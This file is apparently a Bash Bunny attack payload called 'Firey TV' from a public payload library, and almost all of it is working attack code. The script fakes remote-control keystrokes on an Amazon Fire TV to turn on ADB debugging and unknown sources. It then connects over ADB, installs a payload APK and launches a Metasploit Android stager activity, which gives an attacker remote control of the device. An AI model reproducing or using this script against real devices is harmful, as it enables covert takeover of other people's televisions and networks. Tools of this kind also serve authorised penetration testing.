bashbunny-payloads/payloads/library/android/fireytv/payload.txt

# Title:         Firey TV
# Author:        DemmSec
# Version:       1.0
#
# Enables ADB and unknown sources on a target FireTV
# Then pushes a payload APK via ADB
#
# Requires android-tools-adb installed on the Bash Bunny
#
# Purple ............Running HID emulation, enabling ADB and unknown sources
# Blue Blinking ...............Running ADB command to push payload.apk
# Red Blinking.......FireTV failed to get an IP address from the Bash Bunny
# Green..............Finished

LED SETUP
GET TARGET_IP
GET SWITCH_POSITION

ATTACKMODE HID
LED ATTACK
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q DOWNARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 500
Q ENTER
Q DELAY 500
Q DOWNARROW
Q DELAY 800
Q ENTER
Q DELAY 800
Q ENTER
Q DELAY 500
Q DOWNARROW
Q DELAY 500
Q DOWNARROW
Q DELAY 500
Q ENTER
Q DELAY 200
Q ENTER
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
ATTACKMODE ECM_ETHERNET
LED B 2000
if [ -z "${TARGET_IP}" ]; then
    LED FAIL
	exit 1
fi
adb connect ${TARGET_IP}
adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk
adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"
LED FINISH